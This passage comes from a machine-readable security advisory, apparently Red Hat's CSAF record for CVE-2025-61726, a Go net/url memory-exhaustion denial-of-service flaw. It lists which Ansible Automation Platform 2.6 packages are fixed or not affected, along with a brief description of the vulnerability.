"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
